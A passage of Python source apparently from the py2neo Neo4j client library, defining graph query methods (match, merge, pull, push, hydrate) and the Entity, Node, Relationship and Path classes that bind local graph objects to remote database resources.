a.labels().update(cursor[1])\n yield a\n cursor.close()\n\n def find_one(self, label, property_key=None, property_value=None):\n \"\"\" Find a single node by label and optional property. This method is\n intended to be used with a unique constraint and does not fail if more\n than one matching node is found.\n \"\"\"\n for node in self.find(label, property_key, property_value, limit=1):\n return node\n\n def hydrate(self, data, inst=None):\n \"\"\" Hydrate a dictionary of data to produce a :class:`.Node`,\n :class:`.Relationship` or other graph object instance. The\n data structure and values expected are those produced by the\n `REST API `__.\n\n :arg data: dictionary of data to hydrate\n\n \"\"\"\n if isinstance(data, dict):\n if \"errors\" in data and data[\"errors\"]:\n from py2neo.status import CypherError\n for error in data[\"errors\"]:\n raise CypherError.hydrate(error)\n elif \"self\" in data:\n if \"type\" in data:\n return Relationship.hydrate(data, inst)\n else:\n return Node.hydrate(data, inst)\n elif \"nodes\" in data and \"relationships\" in data:\n if \"directions\" not in data:\n directions = []\n relationships = self.cypher.evaluate(\n \"MATCH ()-[r]->() WHERE id(r) IN {x} RETURN collect(r)\",\n x=[int(uri.rpartition(\"/\")[-1]) for uri in data[\"relationships\"]])\n node_uris = data[\"nodes\"]\n for i, relationship in enumerate(relationships):\n if relationship.start_node().uri == node_uris[i]:\n directions.append(\"->\")\n else:\n directions.append(\"<-\")\n data[\"directions\"] = directions\n return Path.hydrate(data)\n elif \"results\" in data:\n return self.hydrate(data[\"results\"][0])\n elif \"columns\" in data and \"data\" in data:\n from py2neo.cypher import Cursor\n result = Cursor(self, hydrate=True)\n result._process(data)\n return result\n elif \"neo4j_version\" in data:\n return self\n else:\n warn(\"Map literals returned over the Neo4j REST interface are ambiguous \"\n \"and may be hydrated as graph objects\")\n return data\n elif is_collection(data):\n return type(data)(map(self.hydrate, data))\n else:\n return data\n\n def match(self, start_node=None, rel_type=None, end_node=None, bidirectional=False, limit=None):\n \"\"\" Return an iterator for all relationships matching the\n specified criteria.\n\n For example, to find all of Alice's friends::\n\n for rel in graph.match(start_node=alice, rel_type=\"FRIEND\"):\n print(rel.end_node.properties[\"name\"])\n\n :arg start_node: :attr:`~py2neo.Node.bound` start :class:`~py2neo.Node` to match or\n :const:`None` if any\n :arg rel_type: type of relationships to match or :const:`None` if any\n :arg end_node: :attr:`~py2neo.Node.bound` end :class:`~py2neo.Node` to match or\n :const:`None` if any\n :arg bidirectional: :const:`True` if reversed relationships should also be included\n :arg limit: maximum number of relationships to match or :const:`None` if no limit\n :return: matching relationships\n :rtype: generator\n \"\"\"\n if start_node is None and end_node is None:\n statement = \"MATCH (a)\"\n parameters = {}\n elif end_node is None:\n statement = \"MATCH (a) WHERE id(a)={A}\"\n start_node = node(start_node)\n if not start_node.bound:\n raise TypeError(\"Nodes for relationship match end points must be bound\")\n parameters = {\"A\": start_node}\n elif start_node is None:\n statement = \"MATCH (b) WHERE id(b)={B}\"\n end_node = node(end_node)\n if not end_node.bound:\n raise TypeError(\"Nodes for relationship match end points must be bound\")\n parameters = {\"B\": end_node}\n else:\n statement = \"MATCH (a) WHERE id(a)={A} MATCH (b) WHERE id(b)={B}\"\n start_node = node(start_node)\n end_node = node(end_node)\n if not start_node.bound or not end_node.bound:\n raise TypeError(\"Nodes for relationship match end points must be bound\")\n parameters = {\"A\": start_node, \"B\": end_node}\n if rel_type is None:\n rel_clause = \"\"\n elif is_collection(rel_type):\n rel_clause = \":\" + \"|:\".join(\"`{0}`\".format(_) for _ in rel_type)\n else:\n rel_clause = \":`{0}`\".format(rel_type)\n if bidirectional:\n statement += \" MATCH (a)-[r\" + rel_clause + \"]-(b) RETURN r\"\n else:\n statement += \" MATCH (a)-[r\" + rel_clause + \"]->(b) RETURN r\"\n if limit is not None:\n statement += \" LIMIT {0}\".format(int(limit))\n cursor = self.cypher.run(statement, parameters)\n while cursor.move():\n yield cursor[\"r\"]\n\n def match_one(self, start_node=None, rel_type=None, end_node=None, bidirectional=False):\n \"\"\" Return a single relationship matching the\n specified criteria. See :meth:`~py2neo.Graph.match` for\n argument details.\n \"\"\"\n rels = list(self.match(start_node, rel_type, end_node,\n bidirectional, 1))\n if rels:\n return rels[0]\n else:\n return None\n\n def merge(self, label, property_key=None, property_value=None, limit=None):\n \"\"\" Match or create a node by label and optional property and return\n all matching nodes.\n \"\"\"\n if not label:\n raise ValueError(\"Empty label\")\n from py2neo.cypher import cypher_escape\n if property_key is None:\n statement = \"MERGE (n:%s) RETURN n,labels(n)\" % cypher_escape(label)\n parameters = {}\n elif not isinstance(property_key, string):\n raise TypeError(\"Property key must be textual\")\n elif property_value is None:\n raise ValueError(\"Both key and value must be specified for a property\")\n else:\n statement = \"MERGE (n:%s {%s:{V}}) RETURN n,labels(n)\" % (\n cypher_escape(label), cypher_escape(property_key))\n parameters = {\"V\": coerce_property(property_value)}\n if limit:\n statement += \" LIMIT %s\" % limit\n cursor = self.cypher.post(statement, parameters)\n for record in cursor.collect():\n dehydrated = record[0]\n dehydrated.setdefault(\"metadata\", {})[\"labels\"] = record[1]\n yield self.hydrate(dehydrated)\n\n def merge_one(self, label, property_key=None, property_value=None):\n \"\"\" Match or create a node by label and optional property and return a\n single matching node. This method is intended to be used with a unique\n constraint and does not fail if more than one matching node is found.\n\n >>> graph = Graph()\n >>> person = graph.merge_one(\"Person\", \"email\", \"bob@example.com\")\n\n \"\"\"\n for node in self.merge(label, property_key, property_value, limit=1):\n return node\n\n @property\n def neo4j_version(self):\n \"\"\" The database software version as a 4-tuple of (``int``, ``int``,\n ``int``, ``str``).\n \"\"\"\n return version_tuple(self.resource.metadata[\"neo4j_version\"])\n\n def node(self, id_):\n \"\"\" Fetch a node by ID. This method creates an object representing the\n remote node with the ID specified but fetches no data from the server.\n For this reason, there is no guarantee that the entity returned\n actually exists.\n \"\"\"\n resource = self.resource.resolve(\"node/%s\" % id_)\n uri_string = resource.uri.string\n try:\n return Node.cache[uri_string]\n except KeyError:\n node = self.cypher.evaluate(\"MATCH (a) WHERE id(a)={x} \"\n \"RETURN a\", x=id_)\n if node is None:\n raise IndexError(\"Node %d not found\" % id_)\n else:\n return node\n\n @property\n def node_labels(self):\n \"\"\" The set of node labels currently defined within the graph.\n \"\"\"\n if self.__node_labels is None:\n self.__node_labels = Resource(self.uri.string + \"labels\")\n return frozenset(self.__node_labels.get().content)\n\n def open_browser(self):\n \"\"\" Open a page in the default system web browser pointing at\n the Neo4j browser application for this graph.\n \"\"\"\n webbrowser.open(self.dbms.resource.uri.string)\n\n def order(self):\n \"\"\" The number of nodes in this graph.\n \"\"\"\n statement = \"MATCH (n) RETURN count(n)\"\n return self.cypher.evaluate(statement)\n\n def pull(self, *entities):\n \"\"\" Pull data to one or more entities from their remote counterparts.\n \"\"\"\n if not entities:\n return\n nodes = {}\n relationships = set()\n for entity in entities:\n for node in entity.nodes():\n nodes[node] = None\n relationships.update(entity.relationships())\n tx = self.cypher.begin()\n for node in nodes:\n cursor = tx.run(\"MATCH (a) WHERE id(a)={x} \"\n \"RETURN a, labels(a)\", x=node._id)\n cursor.cache[\"a\"] = node\n nodes[node] = cursor\n for relationship in relationships:\n cursor = tx.run(\"MATCH ()-[r]->() WHERE id(r)={x} \"\n \"RETURN r\", x=relationship._id)\n cursor.cache[\"r\"] = relationship\n tx.commit()\n for node, cursor in nodes.items():\n labels = node.labels()\n labels.clear()\n labels.update(cursor.evaluate(1))\n\n def push(self, *entities):\n \"\"\" Push data from one or more entities to their remote counterparts.\n \"\"\"\n batch = []\n i = 0\n for entity in entities:\n for node in entity.nodes():\n batch.append({\"id\": i, \"method\": \"PUT\",\n \"to\": \"node/%d/properties\" % node._id,\n \"body\": dict(node)})\n i += 1\n batch.append({\"id\": i, \"method\": \"PUT\",\n \"to\": \"node/%d/labels\" % node._id,\n \"body\": list(node.labels())})\n i += 1\n for relationship in entity.relationships():\n batch.append({\"id\": i, \"method\": \"PUT\",\n \"to\": \"relationship/%d/properties\" % relationship._id,\n \"body\": dict(relationship)})\n i += 1\n self.resource.resolve(\"batch\").post(batch)\n\n def relationship(self, id_):\n \"\"\" Fetch a relationship by ID.\n \"\"\"\n resource = self.resource.resolve(\"relationship/\" + str(id_))\n uri_string = resource.uri.string\n try:\n return Relationship.cache[uri_string]\n except KeyError:\n relationship = self.cypher.evaluate(\"MATCH ()-[r]->() WHERE id(r)={x} \"\n \"RETURN r\", x=id_)\n if relationship is None:\n raise IndexError(\"Relationship %d not found\" % id_)\n else:\n return relationship\n\n @property\n def relationship_types(self):\n \"\"\" The set of relationship types currently defined within the graph.\n \"\"\"\n if self.__relationship_types is None:\n self.__relationship_types = Resource(self.uri.string + \"relationship/types\")\n return frozenset(self.__relationship_types.get().content)\n\n @property\n def schema(self):\n \"\"\" The schema resource for this graph.\n\n :rtype: :class:`SchemaResource `\n \"\"\"\n if self.__schema is None:\n from py2neo.schema import SchemaResource\n self.__schema = SchemaResource(self.uri.string + \"schema\")\n return self.__schema\n\n def size(self):\n \"\"\" The number of relationships in this graph.\n \"\"\"\n statement = \"MATCH ()-[r]->() RETURN count(r)\"\n return self.cypher.evaluate(statement)\n\n def supports_auth(self):\n \"\"\" Returns :py:`True` if auth is supported by this version of Neo4j.\n \"\"\"\n return self.neo4j_version >= (2, 2)\n\n @property\n def uri(self):\n return self.resource.uri\n\n\nclass Entity(object):\n \"\"\" Base class for objects that can be optionally bound to a remote resource. This\n class is essentially a container for a :class:`.Resource` instance.\n \"\"\"\n\n #: The class of error raised by failure responses from the contained resource.\n error_class = GraphError\n\n __resource__ = None\n\n _bind_pending_tx = None\n\n def _process_if_bind_pending(self):\n if self._bind_pending_tx:\n self._bind_pending_tx.process()\n self._bind_pending_tx = None\n\n def __eq__(self, other):\n self._process_if_bind_pending()\n try:\n return self.bound and other.bound and self.uri == other.uri\n except AttributeError:\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def bind(self, uri, metadata=None):\n \"\"\" Associate this «class.lower» with a remote resource.\n\n :arg uri: The URI identifying the remote resource to which to bind.\n :arg metadata: Dictionary of initial metadata to attach to the contained resource.\n\n \"\"\"\n if \"{\" in uri and \"}\" in uri:\n if metadata:\n raise ValueError(\"Initial metadata cannot be passed to a resource template\")\n self.__resource__ = ResourceTemplate(uri)\n else:\n self.__resource__ = Resource(uri, metadata)\n self.__resource__.error_class = self.error_class\n self._bind_pending_tx = None\n\n def set_bind_pending(self, tx):\n \"\"\" Flag that this entity is due to be bound on processing of\n the specified transaction.\n\n :param tx:\n :return:\n \"\"\"\n self._bind_pending_tx = tx\n\n @property\n def bound(self):\n \"\"\" :const:`True` if this object is bound to a remote resource,\n :const:`False` otherwise.\n \"\"\"\n self._process_if_bind_pending()\n return self.__resource__ is not None\n\n @property\n def graph(self):\n \"\"\" The graph associated with the remote resource.\n\n :rtype: :class:`.Graph`\n \"\"\"\n self._process_if_bind_pending()\n return self.dbms.graph\n\n @property\n def cypher(self):\n \"\"\" The Cypher engine associated with the remote resource.\n\n :rtype: :class:`.CypherEngine`\n \"\"\"\n self._process_if_bind_pending()\n return self.dbms.graph.cypher\n\n @property\n def ref(self):\n \"\"\" The URI of the remote resource relative to its graph.\n\n :rtype: string\n \"\"\"\n self._process_if_bind_pending()\n return self.resource.ref\n\n @property\n def resource(self):\n \"\"\" The remote resource to which this object is bound.\n\n :rtype: :class:`.Resource`\n :raises: :class:`py2neo.BindError`\n \"\"\"\n self._process_if_bind_pending()\n if self.bound:\n return self.__resource__\n else:\n raise BindError(\"Local entity is not bound to a remote entity\")\n\n @property\n def dbms(self):\n \"\"\" The root service associated with the remote resource.\n\n :return: :class:`.DBMS`\n \"\"\"\n self._process_if_bind_pending()\n return self.resource.dbms\n\n def unbind(self):\n \"\"\" Detach this object from any remote resource.\n \"\"\"\n self.__resource__ = None\n self._bind_pending_tx = None\n\n @property\n def uri(self):\n \"\"\" The full URI of the remote resource.\n \"\"\"\n self._process_if_bind_pending()\n resource = self.resource\n try:\n return resource.uri\n except AttributeError:\n return resource.uri_template\n\n\nclass Node(PrimitiveNode, Entity):\n \"\"\" A graph node that may optionally be bound to a remote counterpart\n in a Neo4j database. Nodes may contain a set of named :attr:`~py2neo.Node.properties` and\n may have one or more :attr:`labels ` applied to them::\n\n >>> from py2neo import Node\n >>> alice = Node(\"Person\", name=\"Alice\")\n >>> banana = Node(\"Fruit\", \"Food\", colour=\"yellow\", tasty=True)\n\n All positional arguments passed to the constructor are interpreted\n as labels and all keyword arguments as properties. It is also possible to\n construct Node instances from other data types (such as a dictionary)\n by using the :meth:`.cast_node` class method::\n\n >>> bob = node({\"name\": \"Bob Robertson\", \"age\": 44})\n\n Labels and properties can be accessed and modified using the\n :attr:`labels ` and :attr:`~py2neo.Node.properties`\n attributes respectively. The former is an instance of :class:`.LabelSet`,\n which extends the built-in :class:`set` class, and the latter is an\n instance of :class:`.PropertySet` which extends :class:`dict`.\n\n >>> alice[\"name\"]\n 'Alice'\n >>> alice.labels()\n {'Person'}\n >>> alice.add_label(\"Employee\")\n >>> alice[\"employee_no\"] = 3456\n >>> alice\n \n\n One of the core differences between a :class:`.PropertySet` and a standard\n dictionary is in how it handles :const:`None` and missing values. As with actual Neo4j\n properties, missing values and those equal to :const:`None` are equivalent.\n \"\"\"\n\n cache = ThreadLocalWeakValueDictionary()\n\n __id = None\n\n @classmethod\n def hydrate(cls, data, inst=None):\n \"\"\" Hydrate a dictionary of data to produce a :class:`.Node` instance.\n The data structure and values expected are those produced by the\n `REST API `__\n although only the ``self`` value is required.\n\n :arg data: dictionary of data to hydrate\n :arg inst: an existing :class:`.Node` instance to overwrite with new values\n\n \"\"\"\n self = data[\"self\"]\n if inst is None:\n new_inst = cls()\n new_inst.__stale.update({\"labels\", \"properties\"})\n inst = cls.cache.setdefault(self, new_inst)\n # The check below is a workaround for http://bugs.python.org/issue19542\n # See also: https://github.com/nigelsmall/py2neo/issues/391\n if inst is None:\n inst = cls.cache[self] = new_inst\n cls.cache[self] = inst\n inst.bind(self, data)\n if \"data\" in data:\n inst.__stale.discard(\"properties\")\n inst.clear()\n inst.update(data[\"data\"])\n if \"metadata\" in data:\n inst.__stale.discard(\"labels\")\n metadata = data[\"metadata\"]\n inst.clear_labels()\n inst.update_labels(metadata[\"labels\"])\n return inst\n\n def __init__(self, *labels, **properties):\n PrimitiveNode.__init__(self, *labels, **properties)\n self.__stale = set()\n\n def __repr__(self):\n s = [self.__class__.__name__]\n if self.bound:\n s.append(\"graph=%r\" % self.graph.uri.string)\n s.append(\"ref=%r\" % self.ref)\n if \"labels\" in self.__stale:\n s.append(\"labels=?\")\n else:\n s.append(\"labels=%r\" % set(self.labels()))\n if \"properties\" in self.__stale:\n s.append(\"properties=?\")\n else:\n s.append(\"properties=%r\" % dict(self))\n else:\n s.append(\"labels=%r\" % set(self.labels()))\n s.append(\"properties=%r\" % dict(self))\n return \"<\" + \" \".join(s) + \">\"\n\n def __str__(self):\n return xstr(self.__unicode__())\n\n def __unicode__(self):\n from py2neo.cypher import CypherWriter\n s = StringIO()\n writer = CypherWriter(s)\n if self.bound:\n writer.write_node(self, \"n\" + ustr(self._id))\n else:\n writer.write_node(self)\n return s.getvalue()\n\n def __eq__(self, other):\n if other is None:\n return False\n other = node(other)\n if self.bound and other.bound:\n return self.resource == other.resource\n else:\n return PrimitiveNode.__eq__(self, other)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __hash__(self):\n if self.bound:\n return hash(self.resource.uri)\n else:\n return PrimitiveNode.__hash__(self)\n\n def __add__(self, other):\n return Path(self, other)\n\n def __getitem__(self, item):\n if self.bound and \"properties\" in self.__stale:\n self.refresh()\n return PrimitiveNode.__getitem__(self, item)\n\n @property\n def _id(self):\n \"\"\" The internal ID of this node within the database.\n \"\"\"\n if self.__id is None:\n self.__id = int(self.uri.path.segments[-1])\n return self.__id\n\n @property\n def ref(self):\n \"\"\" The URI of this node relative to its graph.\n\n :rtype: string\n \"\"\"\n return \"node/%s\" % self._id\n\n def bind(self, uri, metadata=None):\n \"\"\" Associate this node with a remote node.\n\n :arg uri: The URI identifying the remote node to which to bind.\n :arg metadata: Dictionary of initial metadata to attach to the contained resource.\n\n \"\"\"\n Entity.bind(self, uri, metadata)\n self.cache[uri] = self\n\n def degree(self):\n \"\"\" The number of relationships attached to this node.\n \"\"\"\n return self.cypher.evaluate(\"MATCH (a)-[r]-() WHERE id(a)={n} RETURN count(r)\", n=self)\n\n @deprecated(\"Node.exists() is deprecated, use graph.exists(node) instead\")\n def exists(self):\n \"\"\" :const:`True` if this node exists in the database,\n :const:`False` otherwise.\n \"\"\"\n return self.graph.exists(self)\n\n def labels(self):\n \"\"\" The set of labels attached to this node.\n \"\"\"\n if self.bound and \"labels\" in self.__stale:\n self.refresh()\n return PrimitiveNode.labels(self)\n\n @deprecated(\"Node.match() is deprecated, use graph.match(node, ...) instead\")\n def match(self, rel_type=None, other_node=None, limit=None):\n \"\"\" Return an iterator for all relationships attached to this node\n that match the specified criteria. See :meth:`.Graph.match` for\n argument details.\n \"\"\"\n return self.graph.match(self, rel_type, other_node, True, limit)\n\n @deprecated(\"Node.match_incoming() is deprecated, use graph.match(node, ...) instead\")\n def match_incoming(self, rel_type=None, start_node=None, limit=None):\n \"\"\" Return an iterator for all incoming relationships to this node\n that match the specified criteria. See :meth:`.Graph.match` for\n argument details.\n \"\"\"\n return self.graph.match(start_node, rel_type, self, False, limit)\n\n @deprecated(\"Node.match_outgoing() is deprecated, use graph.match(node, ...) instead\")\n def match_outgoing(self, rel_type=None, end_node=None, limit=None):\n \"\"\" Return an iterator for all outgoing relationships from this node\n that match the specified criteria. See :meth:`.Graph.match` for\n argument details.\n \"\"\"\n return self.graph.match(self, rel_type, end_node, False, limit)\n\n @property\n @deprecated(\"Node.properties is deprecated, use dict(node) instead\")\n def properties(self):\n \"\"\" The set of properties attached to this node. Properties\n can also be read from and written to any :class:`Node`\n by using the index syntax directly. This means\n the following statements are equivalent::\n\n node.properties[\"name\"] = \"Alice\"\n node[\"name\"] = \"Alice\"\n\n \"\"\"\n if self.bound and \"properties\" in self.__stale:\n self.refresh()\n return dict(self)\n\n @deprecated(\"Node.pull() is deprecated, use graph.pull(node) instead\")\n def pull(self):\n \"\"\" Pull data to this node from its remote counterpart. Consider\n using :meth:`.Graph.pull` instead for batches of nodes.\n \"\"\"\n self.graph.pull(self)\n\n @deprecated(\"Node.push() is deprecated, use graph.push(node) instead\")\n def push(self):\n \"\"\" Push data from this node to its remote counterpart. Consider\n using :meth:`.Graph.push` instead for batches of nodes.\n \"\"\"\n self.graph.push(self)\n\n def refresh(self):\n # Non-destructive pull.\n # Note: this may fail if attempted against an entity mid-transaction\n # that has not yet been committed.\n query = \"MATCH (a) WHERE id(a)={a} RETURN a,labels(a)\"\n content = self.cypher.post(query, {\"a\": self._id})\n try:\n dehydrated, label_metadata = content.select()\n except IndexError:\n raise GraphError(\"Node with ID %s not found\" % self._id)\n else:\n dehydrated.setdefault(\"metadata\", {})[\"labels\"] = label_metadata\n Node.hydrate(dehydrated, self)\n\n def unbind(self):\n \"\"\" Detach this node from any remote counterpart.\n \"\"\"\n try:\n del self.cache[self.uri]\n except KeyError:\n pass\n Entity.unbind(self)\n self.__id = None\n\n\nclass NodeProxy(object):\n \"\"\" Base class for objects that can be used in place of a node.\n \"\"\"\n pass\n\n\nclass Relationship(PrimitiveRelationship, Entity):\n \"\"\" A graph relationship that may optionally be bound to a remote counterpart\n in a Neo4j database. Relationships require a triple of start node, relationship\n type and end node and may also optionally be given one or more properties::\n\n >>> from py2neo import Node, Relationship\n >>> alice = Node(\"Person\", name=\"Alice\")\n >>> bob = Node(\"Person\", name=\"Bob\")\n >>> alice_knows_bob = Relationship(alice, \"KNOWS\", bob, since=1999)\n\n \"\"\"\n\n cache = ThreadLocalWeakValueDictionary()\n\n __id = None\n\n @classmethod\n def hydrate(cls, data, inst=None):\n \"\"\" Hydrate a dictionary of data to produce a :class:`.Relationship` instance.\n The data structure and values expected are those produced by the\n `REST API `__.\n\n :arg data: dictionary of data to hydrate\n :arg inst: an existing :class:`.Relationship` instance to overwrite with new values\n\n \"\"\"\n self = data[\"self\"]\n if inst is None:\n new_inst = cls(Node.hydrate({\"self\": data[\"start\"]}),\n data.get(\"type\"),\n Node.hydrate({\"self\": data[\"end\"]}),\n **data.get(\"data\", {}))\n inst = cls.cache.setdefault(self, new_inst)\n # The check below is a workaround for http://bugs.python.org/issue19542\n # See also: https://github.com/nigelsmall/py2neo/issues/391\n if inst is None:\n inst = cls.cache[self] = new_inst\n else:\n Node.hydrate({\"self\": data[\"start\"]}, inst.start_node())\n Node.hydrate({\"self\": data[\"end\"]}, inst.end_node())\n inst._type = data.get(\"type\")\n if \"data\" in data:\n inst.clear()\n inst.update(data[\"data\"])\n else:\n inst.__stale.add(\"properties\")\n cls.cache[self] = inst\n inst.bind(self, data)\n return inst\n\n def __init__(self, *nodes, **properties):\n n = []\n p = {}\n for value in nodes:\n if isinstance(value, string):\n n.append(value)\n elif isinstance(value, tuple) and len(value) == 2 and isinstance(value[0], string):\n t, props = value\n n.append(t)\n p.update(props)\n else:\n n.append(node(value))\n p.update(properties)\n PrimitiveRelationship.__init__(self, *n, **p)\n self.__stale = set()\n\n def __repr__(self):\n s = [self.__class__.__name__]\n if self.bound:\n s.append(\"graph=%r\" % self.graph.uri.string)\n s.append(\"ref=%r\" % self.ref)\n s.append(\"start=%r\" % self.start_node().ref)\n s.append(\"end=%r\" % self.end_node().ref)\n if self._type is None:\n s.append(\"type=?\")\n else:\n s.append(\"type=%r\" % self._type)\n if \"properties\" in self.__stale:\n s.append(\"properties=?\")\n else:\n s.append(\"properties=%r\" % dict(self))\n else:\n s.append(\"type=%r\" % self._type)\n s.append(\"properties=%r\" % dict(self))\n return \"<\" + \" \".join(s) + \">\"\n\n def __str__(self):\n return xstr(self.__unicode__())\n\n def __unicode__(self):\n from py2neo.cypher import CypherWriter\n s = StringIO()\n writer = CypherWriter(s)\n writer.write_relationship(self, \"r%s\" % self._id if self.bound else \"\", self)\n return s.getvalue()\n\n def __eq__(self, other):\n if other is None:\n return False\n other = relationship(other)\n if self.bound and other.bound:\n return self.resource == other.resource\n else:\n return PrimitiveRelationship.__eq__(self, other)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __hash__(self):\n if self.bound:\n return hash(self.resource.uri)\n else:\n return PrimitiveRelationship.__hash__(self)\n\n @property\n def _id(self):\n \"\"\" The internal ID of this relationship within the database.\n \"\"\"\n if self.__id is None:\n self.__id = int(self.uri.path.segments[-1])\n return self.__id\n\n def bind(self, uri, metadata=None):\n \"\"\" Associate this relationship with a remote relationship. The start and\n end nodes will also be associated with their corresponding remote nodes.\n\n :arg uri: The URI identifying the remote relationship to which to bind.\n :arg metadata: Dictionary of initial metadata to attach to the contained resource.\n\n \"\"\"\n Entity.bind(self, uri, metadata)\n self.cache[uri] = self\n\n for node, position in [(self.start_node(), \"start\"), (self.end_node(), \"end\")]:\n if not isinstance(node, Node):\n continue\n new_node_uri = self.resource.metadata[position]\n if node.bound:\n node_uri = node.uri.string\n if new_node_uri != node_uri:\n raise BindError(\"%s node of relationship %r cannot be bound to \"\n \"%r when already bound to %r\" %\n (position.title(), self._id, new_node_uri, node_uri))\n else:\n node.bind(new_node_uri)\n\n @deprecated(\"Relationship.exists() is deprecated, use graph.exists(relationship) instead\")\n def exists(self):\n \"\"\" :const:`True` if this relationship exists in the database,\n :const:`False` otherwise.\n \"\"\"\n return self.graph.exists(self)\n\n @property\n def graph(self):\n \"\"\" The parent graph of this relationship.\n\n :rtype: :class:`.Graph`\n \"\"\"\n return self.dbms.graph\n\n @property\n @deprecated(\"Relationship.properties is deprecated, use dict(relationship) instead\")\n def properties(self):\n \"\"\" The set of properties attached to this relationship. Properties\n can also be read from and written to any :class:`Relationship`\n by using the index syntax directly. This means\n the following statements are equivalent::\n\n relationship.properties[\"since\"] = 1999\n relationship[\"since\"] = 1999\n\n \"\"\"\n if self.bound and \"properties\" in self.__stale:\n self.graph.pull(self)\n return dict(self)\n\n @deprecated(\"Relationship.pull() is deprecated, use graph.pull(relationship) instead\")\n def pull(self):\n \"\"\" Pull data to this relationship from its remote counterpart.\n \"\"\"\n self.graph.pull(self)\n\n @deprecated(\"Relationship.push() is deprecated, use graph.push(relationship) instead\")\n def push(self):\n \"\"\" Push data from this relationship to its remote counterpart.\n \"\"\"\n self.graph.push(self)\n\n @property\n def ref(self):\n \"\"\" The URI of this relationship relative to its graph.\n\n :rtype: string\n \"\"\"\n return \"relationship/%s\" % self._id\n\n def type(self):\n \"\"\" The type of this relationship.\n \"\"\"\n if self.bound and self._type is None:\n self.graph.pull(self)\n return self._type\n\n def unbind(self):\n \"\"\" Detach this relationship and its start and end\n nodes from any remote counterparts.\n \"\"\"\n try:\n del self.cache[self.uri]\n except KeyError:\n pass\n Entity.unbind(self)\n self.__id = None\n\n\nclass Path(PrimitivePath):\n \"\"\" A sequence of nodes connected by relationships that may\n optionally be bound to remote counterparts in a Neo4j database.\n\n >>> from py2neo import Node, Path\n >>> alice, bob, carol = Node(name=\"Alice\"), Node(name=\"Bob\"), Node(name=\"Carol\")\n >>> abc = Path(alice, \"KNOWS\", bob, Relationship(carol, \"KNOWS\", bob), carol)\n >>> abc\n \n >>> abc.nodes\n (,\n ,\n )\n >>> abc.relationships\n (,\n )\n >>> dave, eve = Node(name=\"Dave\"), Node(name=\"Eve\")\n >>> de = Path(dave, \"KNOWS\", eve)\n >>> de\n \n >>> abcde = Path(abc, \"KNOWS\", de)\n >>> abcde\n \n >>> for relationship in abcde.relationships():\n ... print(relationship)\n ({name:\"Alice\"})-[:KNOWS]->({name:\"Bob\"})\n ({name:\"Carol\"})-[:KNOWS]->({name:\"Bob\"})\n ({name:\"Carol\"})-[:KNOWS]->({name:\"Dave\"})\n ({name:\"Dave\"})-[:KNOWS]->({name:\"Eve\"})\n\n \"\"\"\n\n @classmethod\n def hydrate(cls, data, inst=None):\n \"\"\" Hydrate a dictionary of data to produce a :class:`.Path` instance.\n The data structure and values expected are those produced by the\n `REST API `__.\n\n :arg data: dictionary of data to hydrate\n :arg inst: an existing :class:`.Path` instance to overwrite with new values\n\n \"\"\"\n node_uris = data[\"nodes\"]\n relationship_uris = data[\"relationships\"]\n offsets = [(0, 1) if direction == \"->\" else (1, 0) for direction in data[\"directions\"]]\n if inst is None:\n nodes = [Node.hydrate({\"self\": uri}) for uri in node_uris]\n relationships = [Relationship.hydrate({\"self\": uri,\n \"start\": node_uris[i + offsets[i][0]],\n \"end\": node_uris[i + offsets[i][1]]})\n for i, uri in enumerate(relationship_uris)]\n inst = Path(*round_robin(nodes, relationships))\n else:\n for i, node in enumerate(inst.nodes()):\n uri = node_uris[i]\n Node.hydrate({\"self\": uri}, node)\n for i, relationship in enumerate(inst.relationships()):\n uri = relationship_uris[i]\n Relationship.hydrate({\"self\": uri,\n \"start\": node_uris[i + offsets[i][0]],\n \"end\": node_uris[i + offsets[i][1]]}, relationship)\n inst.__metadata = data\n return inst\n\n def __init__(self, *entities):\n entities = list(entities)\n for i, entity in enumerate(entities):\n if entity is None:\n entities[i] = Node()\n elif isinstance(entity, dict):\n entities[i] = Node(**entity)\n for i, entity in enumerate(entities):\n try:\n start_node = entities[i - 1].end_node()\n end_node = entities[i + 1].start_node()\n except (IndexError, AttributeError):\n pass\n else:\n if isinstance(entity, string):\n entities[i] = Relationship(start_node, entity, end_node)\n elif isinstance(entity, tuple) and len(entity) == 2:\n t, properties = entity\n entities[i] = Relationship(start_node, t, end_node, **properties)\n PrimitivePath.__init__(self, *entities)\n\n def __repr__(self):\n s = [self.__class__.__name__]\n if self.bound:\n s.append(\"graph=%r\" % self.graph.uri.string)\n s.append(\"start=%r\" % self.start_node().ref)\n s.append(\"end=%r\" % self.end_node().ref)\n s.append(\"order=%r\" % self.order())\n s.append(\"size=%r\" % self.size())\n return \"<\" + \" \".join(s) + \">\"\n\n def __str__(self):\n return xstr(self.__unicode__())\n\n def __unicode__(self):\n from py2neo.cypher import CypherWriter\n s = StringIO()\n writer = CypherWriter(s)\n writer.write_path(self)\n return s.getvalue()\n\n def append(self, *others):\n \"\"\" Join another path or relationship to the end of this path to form a new path.\n\n :arg others: Entities to join to the end of this path\n :rtype: :class:`.Path`\n \"\"\"\n return Path(self, *others)\n\n @property\n def bound(self):\n \"\"\" :const:`True` if this path is bound to a remote counterpart,\n :const:`False` otherwise.\n \"\"\"\n try:\n _ = self.dbms\n except BindError:\n return False\n else:\n return True\n\n @property\n @deprecated(\"Path.exists() is deprecated, use graph.exists(path) instead\")\n def exists(self):\n \"\"\" :const:`True` if this path exists in the database,\n :const:`False` otherwise.\n \"\"\"\n return self.graph.exists(*(self.nodes() + self.relationships()))\n\n @property\n def graph(self):\n \"\"\" The parent graph of this path.\n\n :rtype: :class:`.Graph`\n \"\"\"\n return self.dbms.graph\n\n def pull(self):\n \"\"\" Pull data to all entities in this path from their remote counterparts.\n \"\"\"\n self.graph.pull(self)\n\n def push(self):\n \"\"\" Push data from all entities in this path to their remote counterparts.\n \"\"\"\n self.graph.push(self)\n\n @property\n def dbms(self):\n \"\"\" The root service associated with this path.\n\n :return: :class:`.DBMS`\n \"\"\"\n for relationship in self:\n try:\n return relationship.dbms\n except BindError:\n pass\n raise BindError(\"Local path is not bound to a remote path\")\n\n def unbind(self):\n \"\"\" Detach all entities in this path\n from any remote counterparts.\n \"\"\"\n for entity in self.relationships() + self.nodes():\n try:\n entity.unbind()\n except BindError:\n pass\n\n\ndef graphy(obj, entities=None):\n \"\"\" Cast a general Python object to a graph-specific entity,\n such as a :class:`.Node` or a :class:`.Relationship`.\n \"\"\"\n if obj is None:\n return None\n elif isinstance(obj, (Node, NodeProxy, Relationship, Path)):\n return obj\n elif isinstance(obj, dict):\n return 